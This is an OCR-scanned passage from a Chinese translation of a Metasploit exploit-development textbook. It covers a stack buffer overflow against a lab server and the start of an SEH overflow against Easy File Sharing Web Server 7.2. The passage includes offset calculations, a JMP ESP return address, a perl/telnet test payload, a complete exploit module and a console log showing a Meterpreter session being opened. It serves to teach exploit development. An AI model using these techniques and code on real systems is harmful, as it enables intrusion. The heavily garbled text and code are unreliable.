是 长 度 一 一 这 个 值 是 1000， 也 就 是 使 用 pattern create 产生 的 字 节 序列 的 长 度 。 可 以 按照 如 下 方 
法 找 出 偏 移 量 。 















































root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern offset.rb 72413372 1000 
[*] Exact match at offset 520 

















计算 出 的 结果 为 520。 因 此 ， 在 520 个 字 节 后 面 的 4 个 字 节 就 会 填写 到 EIP 寄存 器 中 。 











3.24 查找 JMP ESP 地 址 
再 来 回顾 一 下 渗透 过 程 的 图 示 。 


p ree rep ep pe 
Buffer EBP EIP ESP 


520As TU Padding 


到 EIP 寄 存 器 的 偏 移 量 为 520 用 于 去 除 不 确定 因素 的 填充 数据 和 
攻击 载荷 








现在 已 经 成 功 完 成 了 上 图 中 的 第 一 步 ， 下 面 来 查找 JMP ESP 的 地 址 。 之 所 以 需要 这 个 JMP ESP 
指令 的 地 址 , 是 因为 我 们 通过 ESP 寄存 右 来 载 和 攻击 载荷 , 而 不 是 在 填充 满 缓冲 区 之 后 简单 地 找到 攻 
击 载 乎 。 因 此 ， 需 要 从 一 个 外 部 的 DLL 文件 得 到 JMP ESP 指令 的 地 址 ， 这 个 DLL 文件 将 会 使 程序 跳 
转 到 ESP 中 的 地 址 ， 而 这 正 是 攻击 载荷 的 起 始 地 址 。 
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为 了 找到 这 个 跳 转 地 址 ,需要 一 个 调试 器 , 这 样 才能 知道 这 个 有 漏洞 的 应 用 程序 载 人 了 哪些 DLL 
文件 。 我 认为 immunity 调试 器 是 最 好 的 选择 ， 它 提供 了 各 种 用 于 编写 渗透 模块 的 插件 。 

1. 使 用 immunity 调试 器 查找 可 执行 模块 

immunity 调试 器 是 一 种 应 用 程序 , 它 可 以 帮助 我 们 观察 一 个 程序 在 运行 时 的 各 种 行为 。 这 将 有 助 
于 查找 系统 的 漏洞 、 观 察 寄存 右 的 值 以 及 对 程序 实现 逆向 工程 , 等 等 。 TE immunity 调度 器 中 分 析 要 渗 
透 的 应 用 程序 ， 不 仅 能 帮助 我 们 了 解 各 种 寄存 器 中 的 值 ， 也 能 提供 目标 程序 的 各 种 相关 信息 ， 例 如 当 
程序 崩 演 时 的 表现 以 及 可 执行 模块 链接 生成 的 可 执行 文件 。 


单 击 immunity 调试 器 菜单 栏 中 的 FILE 选项 , 然后 在 弹出 的 下 拉 菜 单 中 选择 Open, 这 样 就 可 以 载 
入 你 想 要 调试 的 可 执行 文件 。 另 外 也 可 以 通过 单 击 菜单 栏 上 的 FILE 选项 ， 然 后 在 下 拉 荣 单 中 选择 
Attach 选项 , 将 一 个 程序 的 进程 附加 到 immunity 调试 器 中 。 接 下 来 查看 一 下 如 何 对 一 个 进程 实现 附加 
操作 。 选 择 了 FILEIAttach 后 ， 就 可 以 看 到 目标 系统 中 运行 的 全 部 进程 列表 。 你 需要 做 的 只 是 选择 合 
适 的 进程 。 不 过 , 这 里 需要 特别 强调 一 点 : 当 一 个 进程 附加 到 了 immunity 调试 器 上 之 后 , 默认 情况 下 ， 
它 会 处 于 暂停 状态 。 因 此 , 需要 按 下 Play 按钮 来 将 进程 从 暂停 状态 转换 到 运行 状态 。 来 看 一 下 如 何 将 
一 个 进程 附加 到 immunity 调试 器 。 











n 















































t 



































i 
Select process to attach 





PNI ystem3ZNsvchost.exe 

:NProgram FilesNdinSMTPServerNMindows SMTP Server* 
:NProgram FilesNVMwareNVMware Tools*VMUpgradeHelpe 
:NHINDOHSNExplorer.EXE 

: NHINDOHSNs ystem3ZwNwscntfy.exe 

:NProgram FilesNVMwareNVMware ToolsNVMwareTray.exe 
:NProgram FilesNVMwareNVMware Tools*VMwareUser.exe 
:NDocuments and SettingsNmm*DesktopNbof -server.exe 
:NAINDOHSNSystem32*salsg.exe 

NHINDOLSNs ystem3Z2Nwuauclt.exe 

: NHINDOHSNs ystem3ZNsvchost.exe 

:NHINDOWS\s ystem32Ncmd. exe 同 


[tech | | Cancel 


svchost 
WinSMTPServer 
VMUpgradeHelper 
xplorer 
mener 
VMwareTray 
VMwareUser 
bof -server 
alg 

wuauclt 
svchost 

cmd 


OOOOOOOOOOO: 

















TE F Attach 按钮 之 后 ， 首 先 单 击 View， 然 后 再 选择 Executable Modules， 这 样 就 可 以 看 到 当前 这 
个 有 漏洞 的 应 用 程序 都 载 人 了 哪些 DLL 文件 。 下 面 列 出 了 这 个 程序 所 使 用 的 DLL 文件 。 

















Dl Executable modules 


[Base — [Size |Entry | 
:NDocuments and SettingsMfldministrator*Desktop*bof-seruer.exe 
:*NUINDOUS Ns ystem32Nhnetcfg.dll 


77C10000 OBB588BB 77C1F2A1 msucrt - 
77D408808 800900808 77D5G8EB9 USER32 5.1. 。 
?7DDDDDB AAAFBOAA 77DD78D4 ADUAPI32 5.1.2600.2188 CC:\WINDOWS\system32\ADUAPI32.d11 
77E?8l a BA 77E76284 RPCRT4 5.1.2600.2180 CCG:\WINDOWS\system32\RPCRT4.d11 
BA 77F163CA GDI32 5.1.2600.2180 O C:\WINDOYSNsystem32NGDI32.d11 
4000 7C88B436 kernel32 5.1.2600.2180 :NUINDOWSNsystem32\kerne132 .dl11 
BOBGA 7C913156 ntdll 5.1.2688.2188 © C: NINDOUSNs ystem32Nntd 11.d11 


7.8 188 < IND! 11 
1.268080.2188 € C:NUINDOUSNs ystem32NUSER32 .d11 








现在 已 经 取得 了 DLL 文件 列表 ， 接 下 来 需要 在 它们 中 找到 JMP ESP 的 地 址 。 
2.msfpescan 的 使 用 
在 前 一 节 中 ， 我 们 已 经 找到 了 和 有 漏洞 应 用 程序 相关 联 的 DLL 模块 。 现 在 有 两 种 方案 ， 一 是 使 
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用 immunity 调试 器 查找 JMP ESP 指令 的 地 址 , 这 是 一 个 漫长 又 耗 时 的 过 程 ; 或 者 使 用 msfpescan 在 
一 个 DLL 文件 中 查找 JMP ESP 指令 的 地 址 ， 这 个 过 程 快 很 多 ， 而 且 也 省 去 了 大 量 的 手动 操作 。 


在 命令 行 运行 msfpescan， 可 以 得 到 下 面 的 输出 。 








rootQkali:/usr/share/framework24 ./msfpescan 
Usage: ./msfpescan «input» «mode» «options» 
Inputs: 
-f «file» Read in PE file 
-d «dir» Process memdump output 
Modes: 
-j «reg» Search for jump equivalent instructions 
-S Search for pop+pop+ret combinations 
-X <regex> Search for regex match 
-a «address» Show code at specified virtual address 
-D Display detailed PE information 
-S Attempt to identify the packer/compiler 
Options: 
-A «count» Number of bytes to show after match 
-B «count» Number of bytes to show before match 
-I address Specify an alternate ImageBase 
-n Print disassembly of matched data 











Kali Linux 中 内 置 的 Metasploit 版 本 中 不 再 包含 msfbinscan 和 msfrop 工具 ， 不 过 
如 果 你 在 Ubuntu 中 手动 安装 Metasploit 则 可 以 使 用 这 些 功能 。 


你 可 以 利用 msfpescan 完成 各 种 任务 , 例如 为 基于 SEH 的 栈 溢出 查找 PoP-POP-RET 指令 的 地 址 ， 
或 者 显示 指定 地 址 的 代码 。 现 在 只 需要 查找 JMP ESP 指令 的 地 址 ， 这 可 以 通过 在 参数 -j 后 面 添加 寄存 
器 名 字 来 实现 ， 这 里 寄存 器 的 值 为 ESP。 下 面 在 ws2 32.dl 文件 中 进行 查找 ， 以 找到 JMP ESP 的 地 址 。 


root@kali:/usr/share/framework2# ./msfpescan -j esp -f /root/Desktop/| 
|ws2 32.dll 

0x71ab9372 push esp 

rootgkali: /usr/share/framework2st 




















这 个 命令 返回 的 结果 是 0x71ab9372， 这 是 在 ws2. 32.dll 文件 中 JMP ESP 指令 的 地 址 。 然 后 只 需 


用 这 个 地 址 来 重 写 EIP 寄存 器 中 的 内 容 ， 攻 击 载荷 就 可 以 成 功 找到 并 执行 ShellCode。 








3.2.5 填充 空间 
现在 来 回顾 一 下 这 个 渗透 过 程 图 ， 了 解 当 前 进行 的 步 又。 





j Smmm esi 
EBP EIP 


Buffer ESP 


520 As Padding 





到 EIP 寄 存 器 的 偏 移 量 为 520 用 gone. Dno 
Ei 
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现在 已 经 完成 了 第 二 个 步骤 。 不 过 这 里 必须 指出 一 点 ， 有 了 时 会 由 于 内 存 空间 的 不 规则 分 布 导致 
ShellCode 的 前 几 个 字 节 被 从 整体 中 分 离 了 出 去 ， 从 而 造成 ShellCode 无 法 执行 。 在 这 种 情况 下， 我们 
的 处 理 方法 就 是 在 ShellCode 前 面 添加 一 些 NOP 作为 前 级 , 这 样 就 可 以 按照 预计 来 执行 ShellCode 了 。 


假设 我 们 将 ABCDEF 发 送 到 ESP。 当 使 用 immunity 调试 器 对 其 进行 分 析 时 ,得 到 的 内 容 只 有 DEF。 
在 这 个 示例 中 , 我 们 丢失 了 3 个 字符 。 因 此 , 我 们 将 使 用 3 个 NOP 字 节 或 者 其 他 随机 数据 来 填充 攻击 
载荷 。 
现在 来 看 看 在 有 漏洞 的 应 用 程序 中 进行 数据 填充 是 不 是 必需 的 。 


root@kali:-# perl -e 'print "A" x 520 . "\x72\x93\xab\x71". "ABCDEF"' > 
jnx.txt 

root@kali:-# telnet 192.168.10.104 200 < jnx.txt 

Trying 192.168.10.104... 

Connected to 192.168.10.104. 

Escape character is '^]'. 





















































> Connection closed by foreign host. 


在 上 图 中 ， 我 们 基于 缓冲 区 的 大 小 创建 了 数据 。 我 们 事前 已 经 知道 偏 移 量 是 520， 因 此 在 520 后 
面 以 小 端 模式 给 出 JMP ESP 指令 的 地 址 ， 然 后 给 出 一 串 随 机 的 字符 ， 即 “ABCDEF”。 在 发 送 生 成 的 
随机 字符 之 后 ， 使 用 immunity 调试 器 对 ESP 寄存 器 中 的 内 容 进行 分 析 ， 结 果 如 下 。 












































Registers 《FPU» < 
EAX FFFFFFFF 

ECX 00002737 

EDX 8808080888 

EBX 8808808080808 

ESP pp fiSCII "BCDEF" 





EDI 3D82C758 
EIP 8822FD76 


可 以 看 到 ， 这 个 随机 的 字符 串 “ABCDEF” 中 的 字符 A 已 经 丢失 。 因 此 ， 只 需要 填充 一 个 字 节 就 
可 以 实现 对 齐 操作 。 使 用 少量 额外 的 NOP 来 填充 ShellCode 前 面 的 空间 是 避免 问题 产生 的 最 佳 实践 。 

NOP 的 实用 性 

NOP 和 NOP-sled 指 的 是 不 进行 任何 操作 的 指令 。 它 的 任务 仅仅 是 使 程序 在 没有 完成 任何 操作 的 
状态 下 执行 到 下 一 个 内 存 地 址 。 使 用 NOP 可 以 达到 内 存 中 ShellCode 的 存放 地 址 。 因 此 可 以 在 
ShellCode 前 添加 大 量 的 NOP， 这 样 就 消除 了 内 存 地 址 的 不 确定 性 。 这 些 指令 不 进行 任何 操作 ， 仅 仅 
是 顺序 地 执行 到 下 一 个 地 址 。 空 指令 使 用 16 进 制 的 表示 形式 ， 就 是 \x90。 
























































3.2.6 ”确定 坏 字 符 


有 了 时 即便 所 有 渗透 工作 都 已 正确 完成 ， 却 不 能 成 功 渗透 到 目标 系统 中 。 或 者 渗透 工作 完成 了 , 但 
是 攻击 载荷 却 没 有 执行 。 当 渗透 模块 中 提供 的 数据 被 目标 系统 进行 了 截断 或 者 不 当 解 析 时 ， 就 会 出 现 
以 上 现象 。 这 将 导致 整个 渗透 模块 不 能 工作 , 我 们 也 将 无 法 获得 控制 系统 的 shell 或 者 Meterpreter。 在 
这 种 情况 下 ,需要 找到 那些 导致 不 能 运行 的 坏 字 符 。 处 理 这 种 情况 的 最 好 办 法 就 是 找到 匹配 的 渗透 模 
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块 ， 将 坏 字符 从 渗透 模块 中 移 除 。 
需要 在 渗透 模块 的 payload 段 中 定义 这 些 坏 字符 。 看 看 下 面 这 个 例子 。 


'Payload' I» 
{ 
'Space' -» 800, 
'BadChars' => "\x00\x20\x0a\x0d", 
'StackAdjustment' => -3500, 





3. 
这 段 代 码 位 于 /exploitwindows/ftp 目录 下 的 freeftpd userrb 文件 中 。 这 里 列 出 的 选项 表明 payload 
所 占用 的 空间 应 该 小 于 800 字 节 ， 而 且 应 该 避免 使 用 0x00、0x20、0x0a 和 0x0d， 也 就 是 null 字符 、 
空格 符 、 换 行 符 和 回 车 符 。 


有 关 确 定 坏 字符 的 更 多 信息 ， 请 访问 : http://resources.infosecinstitute.com/stack-based- 


buffer-overflow-in-win-32-platform-part-6-dealing-with-characters-jmp-instruction/。 


3.2.7 ”确定 空间 限制 


攻击 载荷 中 的 变量 空间 确定 了 用 于 载 和 人 ShellCode 的 空间 大 小 。 我 们 需要 为 载 人 的 攻击 载荷 中 的 
ShellCode 安排 足够 的 空间 。 如 果 攻 击 载荷 很 大 ， 但 是 分 配 的 空间 却 小 于 ShellCode ， 它 将 无 法 执行 。 
另外 , 当 编写 自 定 义 模 块 时 ,ShellCode 越 小 越 好 。 我 们 可 能 会 遇 到 这 样 一 种 情况 ,一 个 可 用 的 ShellCode 
需要 至 少 800 个 字 节 ， 但 是 可 用 空间 只 有 200 个 字 节 。 这 种 情况 下 ， 可 以 先 在 缓冲 区 中 载 人 第 一 个 较 
小 的 ShellCcode， 然 后 再 下 载 和 执行 第 二 个 较 大 的 ShellCode， 这 样 就 可 以 完成 整个 渗透 过 程 。 


人 从 以 下 网 址 可 获得 各 种 攻击 载荷 模块 中 较 小 的 ShellCode: http://www.shell-storm.org/ 























ShellCode/。 


3.2.8 编写 Metasploit 的 渗透 模块 
来 回顾 一 下 渗透 过 程 图 ， 并 检查 是 否 已 经 完成 了 模块 。 








与 EIP 寄 存 器 之 间 的 偏 移 量 为 520 攻击 载荷 





到 现在 为 止 ， 我 们 已 经 掌握 了 开发 Metasploit 模块 所 需 的 所 有 内 容 。 因 为 在 Metasploit 中 ， 攻 击 
载荷 是 自动 生成 的 ， 而 且 也 可 以 动态 地 进行 修改 。 好 了 ， 现 在 就 开始 吧 ! 
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class MetasploitModule < Msf::Exploit::Remote 
Rank = NormalRanking 


include Msf::Exploit::Remote::Tcp 


def initialize(info = {} 
super(update info(info, 
'Name' -» 'Stack Based Buffer Overflow Example', 
'Description' => %q{ 


在 开始 运行 这 段 代 码 之 前 ， 先 来 看 看 这 段 代码 


Stack Based Overflow Example Application Exploitation Module 


Rs 
'Platform' -» 'win', 
'Author' => 

[ 

'Nipun Jaswal' 

um 
'Payload' => 
{ 
'space' -» 1000, 
'BadChars' => "Ax00Nxff", 
js 
"DTargets' => 

[ 

['Windows XP SP2',( 'Ret' -» 0x71AB9372 
]， 
'DisclosureDate' -» 'Mar 04 2018' 
) ) 
register options( 
[ 
Opt : : RPORT (200) 

1) 


end 








引入 语句 路 径 


'Offset' -» 520)]] 


使 用 的 库 文件 。 


用 B 





Msf::Exploit::Remote::Tcp /lib/msf/core/exploit/tcp.rb 


TCP 库 文件 提供 了 基础 的 TCP 函 数 ， 例 
如 连接 、 断 开 、 写 数据 等 














我 们 按照 和 第 2 章 完全 一 样 的 方式 来 构建 模块 。 首 先 包含 必 要 的 库 路 径 ， 再 从 这 些 路 径 引 入 必需 
的 文件 。 将 模块 的 类 型 定义 为 Msf: :Exploit: :Remote， 这 表示 一 个 远程 渗透 模块 。 接 下 来 初始 化 
















































































构造 函数 ， 在 其 中 定义 名 字 、 措 述 、 作 者 信息 等 内 容 。 然 而 ， 在 这 些 初 始 化 方法 里 有 一 些 新 的 声明 ， 
下 表 给 出 了 这 些 声明 的 详细 信息 。 
声 BB 值 A B 
Platform win 定义 了 涂 透 模块 所 适用 的 目标 平台 ， 值 设 为 win 表示 该 渗透 模 
块 可 以 应 用 在 Windows 类 型 的 操作 系统 上 
DisclosureDate Mar 04 2018 披露 漏洞 的 时 间 
Targets Ret Ret 字 段 给 出 特定 操作 系统 中 JMP ESP 的 地 址 ， 这 个 地 址 的 值 





0x71AB9372 在 上 一 节 中 已 经 找到 
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( 续 ) 

声 明 值 用 i 

Targets Offset 偏 移 量 字段 给 出 了 在 特定 操作 系统 中 填充 EIP 之 前 的 缓冲 区 所 
520 需要 的 字 节 数量 ， 在 上 一 节 中 已 经 找到 了 这 个 值 

Payload Space 攻击 载荷 中 的 变量 space 定 义 了 可 以 使 用 的 最 大 空间 。 这 一 点 
1000 十 分 重要 , 因为 有 时 候 需 要 在 非常 有 限 的 空间 中 加 载 ShellCode 

Payload BadChars Dekk PAIA S BadcharsaE X. T EP E eh R Ib] REORE Aa, 
\x00\xff 的 坏 字 符 。 对 坏 字 符 的 声明 可 以 保证 稳定 性 ， 而且 便于 删除 这 

些 容 易 引 起 应 用 程序 崩溃 或 者 攻击 载荷 失效 的 坏 字符 
我 们 在 register options 字段 定义 了 渗透 模块 的 端口 为 200。 下 面 是 剩余 的 代码 : 





def exploit 




















connect 
buf = make nops(target['Offset']) 
buf = buf + [target['Ret']].pack('V') + make nops(10) + payload.encoded 
Sock.put (buf) 
handler 
disconnect 
end 
end 
下 面 来 了 解 一 些 上 述 代码 中 的 重要 函数 。 
ESSO E ox 件 用 R 
make nops /lib/msf/core/exploit.rb 通过 传递 过 来 的 参数 n 的 值 创建 相同 数量 的 NOP 
connect /lib/msf/core/exploit/tcp.rb 建立 与 目标 的 连接 
disconnect /lib/msf/core/exploit/tcp.rb 切断 与 目标 已 建立 的 连接 
handler /lib/msf/core/exploit.rb 将 连接 传递 给 相关 的 攻击 载荷 handler， 以 检查 活 





透 模块 是 否 成 功 执行 、 连 接 是 否 建立 


在 上 一 节 中 我 们 已 经 了 解 到 , 函数 run 是 作为 辅助 模块 的 默认 函数 被 使 用 的 。 不 过 对 于 渗透 模块 
来 说 ，exploit 才 是 默认 的 主 函 数 。 

首先 使 用 connect 函数 连接 目标 ,然后 使 用 make_nops 函数 生成 520 个 NOP ( 520 这 个 数值 由 
初始 化 部 分 target 声明 中 的 Offset 字段 决定 )。 将 这 520 个 NOP 保存 到 put 变量 中 。 在 接 下 来 的 
一 条 指令 中 , 将 JMP ESP 的 地 址 保存 到 buf ( 这 个 地 址 的 值 由 初始 化 部 分 target 声明 中 Ret 字段 决 
定 ) 中 。 使 用 pack('V' ) 就 可 以 将 这 个 地 址 转换 为 小 端 模式 。 紧 接着 向 Rec 地 址 中 添加 少量 NOP 作为 
ShellCode 的 填充 。 使 用 Metasploit 的 优势 之 一 就 是 可 以 动态 地 切换 攻击 载荷 ， 使 用 payload. encoded 
可 以 将 选中 的 攻击 载荷 添加 到 buf 变量 中 。 

接 下 来 ， 使 用 sock.put 函数 将 buf 的 值 发 送 到 已 连接 的 目标 上 。 然 后 运行 handler MARA H 
标 是 否 已 经 被 成 功 渗透 , 以 及 是 否 成 功 建立 了 一 个 连接 。 最 后 , 使 用 disconnect 上 断 开 和 目标 的 连接 。 
下 面 来 看 看 是 否 成 功 地 渗透 了 这 个 服务 。 
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sf > use exploit/masteringmetasploit/bof-server 

sf exploit(bof-server) > set RHOST 192.168.116.139 

HOST => 192.168.116.139 

msf exploit(bof-server) > set RPORT 200 

RPORT -» 200 

msf exploit(bof-server) » set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind tcp 

msf exploit(bof-server) » exploit 


[*] Started bind handler 

[*] Exploit completed, but no session was created. 
msf exploit(bof-server) » reload 

[*] Reloading module... 

msf exploit(bof-server) » exploit 


[*] Started bind handler 
[*] Sending stage (179267 bytes) to 192.168.116.139 


meterpreter > J 





[*] Meterpreter session 2 opened (192.168.116.137:38321 -> 192.168.116.139:4444) at 2018-03-04 16:46:29 40530 





我 们 设 定好 了 所 需 的 选项 ， 并 将 攻击 载荷 设置 为 windows/meterpreter/bind tcp 一 一 这 个 攻击 载荷 
表示 和 目标 直接 连接 。 可 以 看 到 ， 虽 然 我 们 的 渗透 已 经 开始 了 ， 但 是 没有 成 功 地 建立 会 话 。 因 此 ,我 
































们 将 渗透 代码 中 的 \x00\x 人 修改 为 \x00\x0axx0dx20， 如 下 图 所 示 。 


'Payload' => 


'space' => 1000, 
'BadChars' => "\x00\x0a\xðd\x20", 
}, 














我 们 可 以 在 Metasploit 中 使 用 edit 命令 来 修改 模块 。 默认 情 况 下 ,这 个 文件 将 会 被 VI 编辑 器 加 
载 。 另 外 , 你 也 可 以 使 用 nano 编辑 器 来 进行 修改 。 当 你 完成 了 对 模块 的 修改 之 后 , 就 需要 在 Metasploit 
中 重新 加 载 它 。 目 前 我 们 正在 使 用 的 这 个 模块 就 可 以 使 用 *eload 命令 重新 加 载 ， 如 上 图 所 示 。 重 新 
运行 这 个 模块 , 我 们 立刻 获得 了 目标 的 Meterpreter 控制 权限 。 现在 我 们 已 经 成 功 地 完成 了 第 一 个 渗透 
模块 的 开发 ， 在 下 一 个 示例 中 ， 我 们 将 开始 开发 一 个 高 级 的 渗透 模块 。 






































3.3 ”使 用 Metasploit 实现 基于 SEH 的 缓冲 区 溢出 


异常 处 理 程序 ( exception handler ) 是 用 来 捕获 在 程序 执行 期 间 生 成 的 异常 和 错误 的 代码 模块 ， 这 
种 机 制 可 以 保证 程序 继续 执行 而 不 崩溃 。Windows 操作 系统 中 也 有 默认 的 异常 处 理 程序 ， 在 一 个 应 用 
程序 崩 演 的 时 候 , 我 们 一 般 会 看 到 系统 弹出 一 个 “XYZ 程序 遇 到 错误 , 需要 关闭 ”的 窗口 。 当 程序 产 
































生 了 异常 之 后 ,就 会 从 栈 中 加 载 catch 代码 的 地 址 并 调用 catch 代码 。 
了 栈 中 异常 处 理 程序 的 catch 代码 地 址 ， 我 们 就 能 够 控制 这 个 应 用 程 
理 程序 的 应 用 程序 在 栈 中 是 如 何 安 排 其 内 容 的 。 
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序 。 接 着 来 看 一 个 使 用 了 异常 处 
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catch 块 地 址 





存储 变量 的 空间 


保存 的 EBP 





0x00000000 


TRY 模块 


OxFFFFFFFF 


0x00000000 





OxFFFFFFFF 








由 上 图 可 知 ， 栈 中 包含 了 catch 块 的 地 址 。 还 可 知 ， 只 要 向 程序 提供 足够 多 的 数据 ， 就 可 改写 栈 
中 catch 块 的 地 址 。 因 此 , 可 以 使 用 Metasploit 中 的 pattern. create fll pattern. offset 这 两 个 工 
具 来 找到 这 个 用 于 改写 catch 块 地 址 的 偏 移 量 。 下 面 给 出 了 一 个 示例 。 














root@kali:/usr/share/metasploit-framework/tools/exploit# ./pa 
ttern create.rb 4000 > 4000.txt 











我 们 创建 了 一 个 4000 个 字符 的 字符 序列 ， 并 使 用 TELNET 命令 将 它们 发 送 到 目标 ， 然 后 在 immunity 


调试 器 中 查看 这 个 应 用 程序 的 栈 。 

















Bl1h3FFBC 


@1A3FFCG 
9183FFD8 





45386E45 EnBE 

6E45316E niEn 

336E4532 2En3 Pointer to next SEH record 
45 En4E SE handler 


6E45356E n5En 
376E4536 6En? 








可 以 看 到 , 这 个 应 用 程序 的 栈 中 SE handler 的 地 址 已 经 被 改写 为 453461 
offset 查找 精确 的 偏 移 量 ， 过 程 如 下 图 所 示 。 








E45。 接着 使 月 








H pattern_ 








[*] Exact match at offset 3522 


root@kali:/usr/share/metasploit-framework/tools# ./pattern_offset.rb 45346E45 10 
000 
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精确 的 匹配 值 为 3522。 不 过 这 里 必须 要 指出 一 点 ,根据 SEH 框架 的 结构 ， 可 以 看 到 如 下 图 所 示 
的 部 分 。 





0x00000000 


下 一 条 SEH 记 录 的 地 址 


catch 块 地 址 处 理 程序 的 地 址 





下 一 条 SEH 记 录 的 地 址 





catch 块 地 址 处 理 程序 的 地 址 


下 一 条 SEH 记 录 的 地 址 


catch 块 地 址 处 理 程序 的 地 址 








OxFFFFFFFF 











根据 上 图 ， 一 个 SEH 记录 中 的 前 4 个 字 节 是 它 后 面 的 SEH 异常 处 理 程序 的 地 址 ， 后 4 个 字 节 是 
catch 块 的 地 址 。 一 个 应 用 程序 可 能 有 多 个 异常 处 理 程序 ， 因 此 一 个 SEH 记录 将 前 4 个 字 节 用 来 保存 
下 一 条 SEH 记录 的 地 址 。 下 面 来 看 看 如 何 能 更 好 地 利用 SEH 记录 。 

(1) 引起 应 用 程序 的 异常 ， 这 样 才 可 以 调用 异常 处 理 程序 。 

(2) 使 用 一 条 POP/POP/RETN 指令 的 地 址 来 改写 异常 处 理 程序 的 地 址 ， 因 为 我 们 需要 将 执行 切换 
到 下 一 条 SEH 记录 的 地 址 (catch 异常 处 理 程序 地 址 前 面 的 4 个 字 节 )。 之 所 以 使 用 POP/POP/RET, 
是 因为 用 来 调用 catch. 块 的 内 存 地 址 保存 在 栈 中 ， 指 向 下 一 个 异常 处 理 程序 指针 的 地 址 就 是 ESP+8 
(ESP 是 栈 顶 指针 )。 因 此 ， 两 个 POP 操作 就 可 以 将 执行 重 定 向 到 下 一 条 SEH 记录 的 地 址 。 

(3) 在 第 一 步 输 入 数据 的 时 候 ， 我 们 已 经 将 到 下 一 条 SEH 记录 的 地 址 蔡 换 成 了 跳 转 到 攻击 载荷 的 
JMP 指令 的 地 址 。 因 此 ， 当 第 二 个 步骤 结束 时 ， 程 序 就 会 跳 过 指定 数量 的 字 节 去 执行 ShellCode。 

(4) 当成 功 跳 转 到 ShellCode 之 后 ， 攻 击 载荷 就 会 执行 ， 我 们 也 获得 了 目标 系统 的 管理 权限 。 

下 图 可 以 帮助 我 们 更 好 地 了 解 这 个 过 程 。 
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4. T t pe ds: 中 
-T 一 条 到 攻击 载荷 的 
1 .异常 发 生 ar 










调用 catch 块 ShellCode 


3.POP/POP/RET 的 操作 
可 以 将 执行 重 定向 到 
下 一 跳 SEH 记 录 的 地 址 


2.handler 的 地 址 被 改写 为 
POP/POP/RET 的 地 址 


POP/POP/RET 























ee 当 一 个 异常 发 生 时 ， 异常 处 理 程序 的 地 址 (已 经 使 用 POP/POP/RET 指令 的 地 址 改 
写 过 ) 就 会 被 调用 。 这 会 导致 POP/POP/RET 的 执行 ,并 将 执行 的 流程 重新 定向 到 下 一 条 SEH 记录 的 
a RENNERS 改写 过 )。 因 此 当 JMP 指令 执行 的 时 候 ， 它 会 指向 ShellCode; 而 在 应 
用 程序 看 来 ， 这 个 ShellCode 只 是 另 一 条 SEH 记录 。 


3.3.1 构建 渗透 模块 的 基础 
现在 我 们 已 经 熟悉 了 基本 知识 ， 接 下 来 看 看 建立 一 个 基于 SEH 的 渗透 模块 的 要 点 。 


组 ” 件 用 R 
offset 在 这 个 模块 中 ，offset 指 的 是 用 来 改写 catch 块 地 址 的 输入 字符 的 精确 数量 


POP/POP/RET 地 址 ”为 了 将 执行 重 定向 到 短 跳 转 指令 ， 需要 一 个 POP/POP/RET 指 令 令 序列 的 地 址 。 不 过 现在 最 先进 的 
操作 系统 使 用 了 SafeSEH 机 制 来 进行 DLL 编 译 。 这 条 指令 适用 于 处 理 没有 SafeSEH 保 护 的 DLL 


短 跳 转 指令 为 了 能 跳 转 到 ShellCode 的 开始 处 ， 需 要 跳 过 指定 数量 的 字 节 ， 因 此 就 需要 一 条 短 跳 转 指令 
我 们 现在 需要 一 个 攻击 载荷 ， 并 对 其 进行 消除 坏 字符 、 确 定 空间 限制 等 操作 。 


3.3.2 ”计算 偏 移 量 


我 们 现在 要 处 理 的 这 个 有 漏洞 的 应 用 程序 是 简单 文件 分 享 Web 服务 器 7.2 (Easy File Sharing Web 
Server 7.2 )， 这 个 Web 应 用 程序 在 处 理 请 求 时 存在 漏洞 个 恶意 的 请 求 头 部 就 可 以 引起 缓冲 区 洪 
出 ， 从 而 改写 SEH 链 的 地 址 。 











































































































1. f&FH pattern create 工具 


我 们 可 以 像 之 前 一 样 将 这 个 有 漏洞 的 程序 附加 在 调试 器 上 ， 然 后 使 用 pattern create 和 
pattern offset 这 两 个 工具 来 计算 偏 移 量 。 下 面 给 出 了 具体 过 程 。 



































root@predator:/usr/share/metasploit-framework/tools/exploit# ./pattern create.rb 
10000 > easy file 
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首先 创建 一 个 10 000 个 字符 的 序列 ， 然 后 将 这 个 序列 发 送 到 目标 程序 的 80 端口 ， 并 在 immunity 
调试 器 中 分 析 这 个 程序 的 行为 。 我 们 将 会 看 到 这 个 程序 停止 了 。 然 后 点 击 菜单 栏 上 的 View 选项 ,在 
弹出 的 下 拉 菜 单 中 选中 SEH chain 来 查看 SEH $E, 


















© Immunity Debugger - fsws.exe - [SEH chain of threa 
Debug Plugins ImmLib Option 

Log Alt«L 
Executable modules Alt+E 
Memory Alt+M 
Heap 
Threads 
Windows 
Handles 
CPU Alt«C 
SEH chain Alt+S 
Patches Ctrl+P 
Call stack Alt+K 
Breakpoints Alt+B 
Hardware Breakpoints 
Watches 
References 
Run trace 
Source 
Source files 
File 
Text file 























单 击 SEH chain 选项 就 可 以 看 到 被 我 们 提供 的 数据 所 修改 的 catch 块 和 下 一 条 SEH 记 录 的 地 址 。 











fiddress |SE handler 
902226FRC 46356646 
34664633 xxx CORRUPT ENTRY xxx 





2. fFFH pattern offset 工具 


接着 来 到 下 一 条 SEH 记录 地 址 的 偏 移 量 以 及 到 catch 块 地 址 的 偏 移 量 ， 过 程 如 下 图 所 示 。 





























root@predator:/usr/share/metasploit-framework/tools/exploit# ./pattern offset.rb 
46356646 10000 

[*] Exact match at offset 4065 
rootüpredator:/usr/share/metasploit-framework/tools/exploit& ./pattern offset.rb 
34664633 10000 

[*] Exact match at offset 4061 


可 以 清楚 地 看 到 ， 下 一 条 SEH 记录 的 起 始 地 址 在 4061 字 节 处 ， 而 catch 块 的 偏 移 量 在 它 后 面 4 
个 字 节 ， 也 就 是 4065 字 节 处 。 


























3.83.8 查找 POP/POP/RET 地 址 


正如 之 前 所 讨论 的 , 我 们 需要 POP/POP/RET 指令 的 地 址 来 载 入 下 一 条 SEH 记录 的 地 址 , 并 跳 转 
到 攻击 载荷 。 这 需要 从 一 个 外 部 的 DLL 文件 载 人 一 个 地 址 ， 不 过 现在 大 多 数 最 先进 的 操作 系统 都 使 
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用 SafeSEH 保护 机 制 来 编译 DLL ， 因 此 我 们 需要 一 个 没有 被 SafeSEH 保护 的 DLL 模块 的 
POP/POP/RET 指令 地 址 。 











